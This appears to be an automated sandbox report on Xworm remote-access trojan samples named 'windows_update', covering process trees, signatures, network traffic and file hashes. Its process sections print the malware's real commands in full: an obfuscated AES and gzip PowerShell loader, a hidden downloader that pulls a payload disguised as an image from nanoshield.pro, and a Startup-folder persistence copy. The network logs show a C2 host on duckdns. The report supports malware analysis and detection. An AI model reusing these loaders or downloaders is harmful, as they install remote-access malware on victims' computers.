memory/2104-15-0x0000000002260000-0x00000000022E0000-memory.dmp

memory/2104-16-0x0000000002260000-0x00000000022E0000-memory.dmp

Analysis: behavioral20

Detonation Overview

Submitted

2024-04-19 07:49

Reported

2024-04-19 07:52

Platform

win10v2004-20240226-en

Max time kernel

142s

Max time network

159s

Command Line

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\windows_update\upload.cmd"

Signatures

Detect Xworm Payload

Description Indicator Process Target
N/A N/A N/A N/A

Xworm

trojan rat xworm

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Processes

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\windows_update\upload.cmd"

C:\Windows\system32\cmd.exe

cmd /c \"set __=^&rem\

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /K C:\Users\Admin\AppData\Local\Temp\windows_update\upload.cmd

C:\Windows\system32\cmd.exe

cmd /c \"set __=^&rem\

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\AppData\Local\Temp\windows_update\upload.cmd';$MZYP='MadRzGindRzGModdRzGuldRzGedRzG'.Replace('dRzG', ''),'ChQdTpaQdTpngQdTpeEQdTpxteQdTpnsiQdTponQdTp'.Replace('QdTp', ''),'FGJZSroGJZSmBGJZSasGJZSeGJZS6GJZS4GJZSStrGJZSinGJZSgGJZS'.Replace('GJZS', ''),'GfsYwetfsYwCfsYwurfsYwrfsYwentfsYwProfsYwcefsYwssfsYw'.Replace('fsYw', ''),'ElPbFUePbFUmPbFUenPbFUtPbFUAtPbFU'.Replace('PbFU', ''),'InvEnKDoEnKDkeEnKD'.Replace('EnKD', ''),'Decnyejomnyejprnyejenyejssnyej'.Replace('nyej', ''),'LoaCsUjdCsUj'.Replace('CsUj', ''),'SXMnypliXMnytXMny'.Replace('XMny', ''),'ReYChsadYChsLinYChsesYChs'.Replace('YChs', ''),'TraTpWrnsTpWrfoTpWrrmTpWrFinTpWralTpWrBlTpWrockTpWr'.Replace('TpWr', ''),'CrjagKeajagKtjagKeDejagKcrjagKyjagKpjagKtorjagK'.Replace('jagK', ''),'EqqjYnqqjYtryqqjYPoiqqjYntqqjY'.Replace('qqjY', ''),'CCMrToCMrTpCMrTyToCMrT'.Replace('CMrT', '');powershell -w hidden;function lezXx($vAHtD){$fMpHn=[System.Security.Cryptography.Aes]::Create();$fMpHn.Mode=[System.Security.Cryptography.CipherMode]::CBC;$fMpHn.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$fMpHn.Key=[System.Convert]::($MZYP[2])('Vz0NaMXoskkNfAZDSYL9QEs4+Pg8xizh89PafV/0IEc=');$fMpHn.IV=[System.Convert]::($MZYP[2])('YYQFWZml9Xmr8vgNBAedtQ==');$LBVjX=$fMpHn.($MZYP[11])();$OrsvL=$LBVjX.($MZYP[10])($vAHtD,0,$vAHtD.Length);$LBVjX.Dispose();$fMpHn.Dispose();$OrsvL;}function UqmQx($vAHtD){$YXBBI=New-Object System.IO.MemoryStream(,$vAHtD);$DXQeR=New-Object System.IO.MemoryStream;$GSEpw=New-Object System.IO.Compression.GZipStream($YXBBI,[IO.Compression.CompressionMode]::($MZYP[6]));$GSEpw.($MZYP[13])($DXQeR);$GSEpw.Dispose();$YXBBI.Dispose();$DXQeR.Dispose();$DXQeR.ToArray();}$GbEwM=[System.IO.File]::($MZYP[9])([Console]::Title);$PQord=UqmQx (lezXx ([Convert]::($MZYP[2])([System.Linq.Enumerable]::($MZYP[4])($GbEwM, 5).Substring(2))));$GigRn=UqmQx (lezXx ([Convert]::($MZYP[2])([System.Linq.Enumerable]::($MZYP[4])($GbEwM, 
6).Substring(2))));[System.Reflection.Assembly]::($MZYP[7])([byte[]]$GigRn).($MZYP[12]).($MZYP[5])($null,$null);[System.Reflection.Assembly]::($MZYP[7])([byte[]]$PQord).($MZYP[12]).($MZYP[5])($null,$null); "

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=1400 --field-trial-handle=2256,i,6670388345726423024,18382795228658886258,262144 --variations-seed-version /prefetch:8

Network

Country Destination Domain Proto
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
US 8.8.8.8:53 196.249.167.52.in-addr.arpa udp
US 20.231.121.79:80 tcp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 217.106.137.52.in-addr.arpa udp
US 8.8.8.8:53 vbdsg.duckdns.org udp
GB 57.128.155.22:8896 vbdsg.duckdns.org tcp
US 8.8.8.8:53 22.155.128.57.in-addr.arpa udp
US 8.8.8.8:53 26.165.165.52.in-addr.arpa udp
US 8.8.8.8:53 171.39.242.20.in-addr.arpa udp
US 8.8.8.8:53 149.220.183.52.in-addr.arpa udp
US 8.8.8.8:53 24.139.73.23.in-addr.arpa udp
US 8.8.8.8:53 chromewebstore.googleapis.com udp
US 8.8.8.8:53 chromewebstore.googleapis.com udp
GB 142.250.178.10:443 chromewebstore.googleapis.com tcp
US 8.8.8.8:53 10.178.250.142.in-addr.arpa udp
US 8.8.8.8:53 19.229.111.52.in-addr.arpa udp
US 8.8.8.8:53 240.197.17.2.in-addr.arpa udp
US 8.8.8.8:53 1.173.189.20.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_qq2ufdci.hzq.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/3132-9-0x0000019A34E90000-0x0000019A34EB2000-memory.dmp

memory/3132-10-0x00007FF97B670000-0x00007FF97C131000-memory.dmp

memory/3132-12-0x0000019A1A9B0000-0x0000019A1A9C0000-memory.dmp

memory/3132-11-0x0000019A1A9B0000-0x0000019A1A9C0000-memory.dmp

memory/3132-13-0x0000019A1A9B0000-0x0000019A1A9C0000-memory.dmp

memory/3132-14-0x0000019A352A0000-0x0000019A352E4000-memory.dmp

memory/3132-15-0x0000019A35370000-0x0000019A353E6000-memory.dmp

memory/2184-22-0x00007FF97B670000-0x00007FF97C131000-memory.dmp

memory/2184-23-0x00000228689B0000-0x00000228689C0000-memory.dmp

memory/2184-27-0x00000228689B0000-0x00000228689C0000-memory.dmp

memory/3132-28-0x00007FF97B670000-0x00007FF97C131000-memory.dmp

memory/2184-31-0x00007FF97B670000-0x00007FF97C131000-memory.dmp

memory/3132-33-0x0000019A35250000-0x0000019A35264000-memory.dmp

memory/3132-34-0x00007FF99AA90000-0x00007FF99AC85000-memory.dmp

memory/3132-35-0x00007FF999B20000-0x00007FF999BDE000-memory.dmp

memory/3132-36-0x0000019A35260000-0x0000019A3526C000-memory.dmp

memory/3132-37-0x0000019A35270000-0x0000019A35280000-memory.dmp

memory/3132-38-0x0000019A1A9B0000-0x0000019A1A9C0000-memory.dmp

memory/3132-39-0x0000019A1A9B0000-0x0000019A1A9C0000-memory.dmp

memory/3132-40-0x0000019A1A9B0000-0x0000019A1A9C0000-memory.dmp

Analysis: behavioral22

Detonation Overview

Submitted

2024-04-19 07:49

Reported

2024-04-19 07:52

Platform

win10v2004-20240412-en

Max time kernel

134s

Max time network

137s

Command Line

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\windows_update\upload.vbs"

Signatures

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-355664440-2199602304-1223909400-1000\Control Panel\International\Geo\Nation C:\Windows\System32\WScript.exe N/A

Drops startup file

Description Indicator Process Target
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Music.vbs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Music.vbs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Enumerates physical storage devices

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Processes

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\windows_update\upload.vbs"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$codigo = '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';$oWjuxd = [system.Text.encoding]::Unicode.GetString([system.convert]::Frombase64string( $codigo.replace('DgTre','A') ));powershell.exe -windowstyle hidden -executionpolicy bypass -Noprofile -command $OWjuxD"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://nanoshield.pro/new_image2.jpg?166154725', 'https://nanoshd.pro/files/new_image.jpg?14441723'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('testpowershell.Home'); $method = $type.GetMethod('la').Invoke($null, [object[]] ('txt.dkmmIhF/selif/orp.dleihsonan//:sptth', '1', 'Music'))}}"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden Copy-Item -Path *.vbs -Destination "'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Music.vbs'"

Network

Country Destination Domain Proto
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.237:443 g.bing.com tcp
US 8.8.8.8:53 72.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 19.40.53.23.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 241.154.82.20.in-addr.arpa udp
US 8.8.8.8:53 237.197.79.204.in-addr.arpa udp
US 8.8.8.8:53 21.114.53.23.in-addr.arpa udp
US 8.8.8.8:53 26.35.223.20.in-addr.arpa udp
US 8.8.8.8:53 nanoshd.pro udp
US 8.8.8.8:53 nanoshield.pro udp
US 172.67.203.108:443 nanoshield.pro tcp
US 8.8.8.8:53 108.203.67.172.in-addr.arpa udp
US 8.8.8.8:53 26.165.165.52.in-addr.arpa udp
US 8.8.8.8:53 15.164.165.52.in-addr.arpa udp
US 8.8.8.8:53 65.139.73.23.in-addr.arpa udp
US 8.8.8.8:53 241.197.17.2.in-addr.arpa udp
US 8.8.8.8:53 19.229.111.52.in-addr.arpa udp
US 8.8.8.8:53 240.197.17.2.in-addr.arpa udp
US 8.8.8.8:53 28.173.189.20.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_dcx5rz30.v4i.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/4140-9-0x00000151F7600000-0x00000151F7622000-memory.dmp

memory/4140-10-0x00007FF8421D0000-0x00007FF842C91000-memory.dmp

memory/4140-11-0x00000151DCF40000-0x00000151DCF50000-memory.dmp

memory/4140-12-0x00000151DCF40000-0x00000151DCF50000-memory.dmp

memory/3304-13-0x00007FF8421D0000-0x00007FF842C91000-memory.dmp

memory/3304-23-0x000002C5CDD00000-0x000002C5CDD10000-memory.dmp

memory/3304-24-0x000002C5CD840000-0x000002C5CD88E000-memory.dmp

memory/4136-26-0x000001F8A1DF0000-0x000001F8A1E00000-memory.dmp

memory/4136-25-0x00007FF8421D0000-0x00007FF842C91000-memory.dmp

memory/4136-42-0x00007FF8421D0000-0x00007FF842C91000-memory.dmp

memory/3304-43-0x000002C5CDD00000-0x000002C5CDD10000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 7c0e589f91d9ceee1b937d2bb3381dab
SHA1 1fcdf3e9a0888cf23edb5fa6b2e89ff99b9a6a93
SHA256 b6d1df24d29cf8b985fccb7bb79bcead5bd6cc068b3bc2c8701230baa59b034a
SHA512 65b299281626acfe988b11903072bda49f72003d4186b8e6b6971b1bca4a261e749b91588e139898a26eceb01a56d2a72a5fd2c8f5b78e71a9d54f9359cbe310

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 6cf293cb4d80be23433eecf74ddb5503
SHA1 24fe4752df102c2ef492954d6b046cb5512ad408
SHA256 b1f292b6199aa29c7fafbca007e5f9e3f68edcbbca1965bc828cc92dc0f18bb8
SHA512 0f91e2da0da8794b9797c7b50eb5dfd27bde4546ceb6902a776664ce887dd6f12a0dd8773d612ccc76dfd029cd280778a0f0ae17ce679b3d2ffd968dd7e94a00

memory/3304-47-0x00007FF8421D0000-0x00007FF842C91000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 50a8221b93fbd2628ac460dd408a9fc1
SHA1 7e99fe16a9b14079b6f0316c37cc473e1f83a7e6
SHA256 46e488628e5348c9c4dfcdeed5a91747eae3b3aa49ae1b94d37173b6609efa0e
SHA512 27dda53e7edcc1a12c61234e850fe73bf3923f5c3c19826b67f2faf9e0a14ba6658001a9d6a56a7036409feb9238dd452406e88e318919127b4a06c64dba86f0

memory/4140-50-0x00007FF8421D0000-0x00007FF842C91000-memory.dmp

Analysis: behavioral23

Detonation Overview

Submitted

2024-04-19 07:49

Reported

2024-04-19 07:52

Platform

win7-20240319-en

Max time kernel

118s

Max time network

123s

Command Line

cmd /c "C:\Users\Admin\AppData\Local\Temp\windows_update\windows.cmd"

Signatures

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2252 wrote to memory of 1068 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 2252 wrote to memory of 1068 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 2252 wrote to memory of 1068 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 2252 wrote to memory of 1088 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 2252 wrote to memory of 1088 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 2252 wrote to memory of 1088 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 1088 wrote to memory of 1496 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 1088 wrote to memory of 1496 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 1088 wrote to memory of 1496 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 1088 wrote to memory of 3024 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 1088 wrote to memory of 3024 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 1088 wrote to memory of 3024 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 1088 wrote to memory of 2868 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1088 wrote to memory of 2868 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1088 wrote to memory of 2868 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Processes

C:\Windows\system32\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\windows_update\windows.cmd"

C:\Windows\system32\cmd.exe

cmd /c \"set __=^&rem\

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /K C:\Users\Admin\AppData\Local\Temp\windows_update\windows.cmd

C:\Windows\system32\cmd.exe

cmd /c \"set __=^&rem\

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\AppData\Local\Temp\windows_update\windows.cmd';$GZdQ='InnxIivnxIionxIikenxIi'.Replace('nxIi', ''),'MafFZUifFZUnMfFZUofFZUdulfFZUefFZU'.Replace('fFZU', ''),'RBxvFeaBxvFdLBxvFiBxvFneBxvFsBxvF'.Replace('BxvF', ''),'CryZmpeatyZmpeDyZmpeyZmpcryZmpypyZmptoyZmpryZmp'.Replace('yZmp', ''),'GeCwGCtCCwGCuCwGCrrCwGCenCwGCtCwGCPrCwGCoceCwGCssCwGC'.Replace('CwGC', ''),'ENPQHntNPQHryNPQHPoNPQHintNPQH'.Replace('NPQH', ''),'SZRwRpliZRwRtZRwR'.Replace('ZRwR', ''),'LoTzLuadTzLu'.Replace('TzLu', ''),'DeczTyPompzTyPreszTyPszTyP'.Replace('zTyP', ''),'CofgggpyfgggTofggg'.Replace('fggg', ''),'TrRwWianRwWisfoRwWirRwWimRwWiFiRwWinaRwWilBRwWiloRwWickRwWi'.Replace('RwWi', ''),'ChxtFnanxtFngextFnExxtFntenxtFnsxtFnioxtFnnxtFn'.Replace('xtFn', ''),'FrowqBNmwqBNBwqBNasewqBN64wqBNStrwqBNinwqBNgwqBN'.Replace('wqBN', ''),'ElMUHUeMUHUmMUHUentMUHUAtMUHU'.Replace('MUHU', '');powershell -w hidden;function vJfVF($ktYNE){$OYIYV=[System.Security.Cryptography.Aes]::Create();$OYIYV.Mode=[System.Security.Cryptography.CipherMode]::CBC;$OYIYV.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$OYIYV.Key=[System.Convert]::($GZdQ[12])('HessG9Sp8I98uzvuAQwIGoeAOpm2R4JZwqif+tn9mzM=');$OYIYV.IV=[System.Convert]::($GZdQ[12])('Sq8oY624DUi5D/0NV4f3lQ==');$NPmYK=$OYIYV.($GZdQ[3])();$clLIZ=$NPmYK.($GZdQ[10])($ktYNE,0,$ktYNE.Length);$NPmYK.Dispose();$OYIYV.Dispose();$clLIZ;}function JqmHs($ktYNE){$fhwpD=New-Object System.IO.MemoryStream(,$ktYNE);$yEEHb=New-Object System.IO.MemoryStream;$CPPWk=New-Object System.IO.Compression.GZipStream($fhwpD,[IO.Compression.CompressionMode]::($GZdQ[8]));$CPPWk.($GZdQ[9])($yEEHb);$CPPWk.Dispose();$fhwpD.Dispose();$yEEHb.Dispose();$yEEHb.ToArray();}$rlqXf=[System.IO.File]::($GZdQ[2])([Console]::Title);$bUDiU=JqmHs (vJfVF ([Convert]::($GZdQ[12])([System.Linq.Enumerable]::($GZdQ[13])($rlqXf, 5).Substring(2))));$hdfCS=JqmHs (vJfVF ([Convert]::($GZdQ[12])([System.Linq.Enumerable]::($GZdQ[13])($rlqXf, 
6).Substring(2))));[System.Reflection.Assembly]::($GZdQ[7])([byte[]]$hdfCS).($GZdQ[5]).($GZdQ[0])($null,$null);[System.Reflection.Assembly]::($GZdQ[7])([byte[]]$bUDiU).($GZdQ[5]).($GZdQ[0])($null,$null); "

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Network

N/A

Files

memory/2868-4-0x000000001B160000-0x000000001B442000-memory.dmp

memory/2868-5-0x0000000002420000-0x0000000002428000-memory.dmp

memory/2868-6-0x000007FEF5230000-0x000007FEF5BCD000-memory.dmp

memory/2868-7-0x00000000025F0000-0x0000000002670000-memory.dmp

memory/2868-8-0x00000000025F0000-0x0000000002670000-memory.dmp

memory/2868-9-0x00000000025F0000-0x0000000002670000-memory.dmp

memory/2868-11-0x00000000025F0000-0x0000000002670000-memory.dmp

memory/2868-10-0x000007FEF5230000-0x000007FEF5BCD000-memory.dmp

memory/2868-12-0x000007FEF5230000-0x000007FEF5BCD000-memory.dmp

memory/2868-13-0x00000000025F0000-0x0000000002670000-memory.dmp

memory/2868-14-0x00000000025F0000-0x0000000002670000-memory.dmp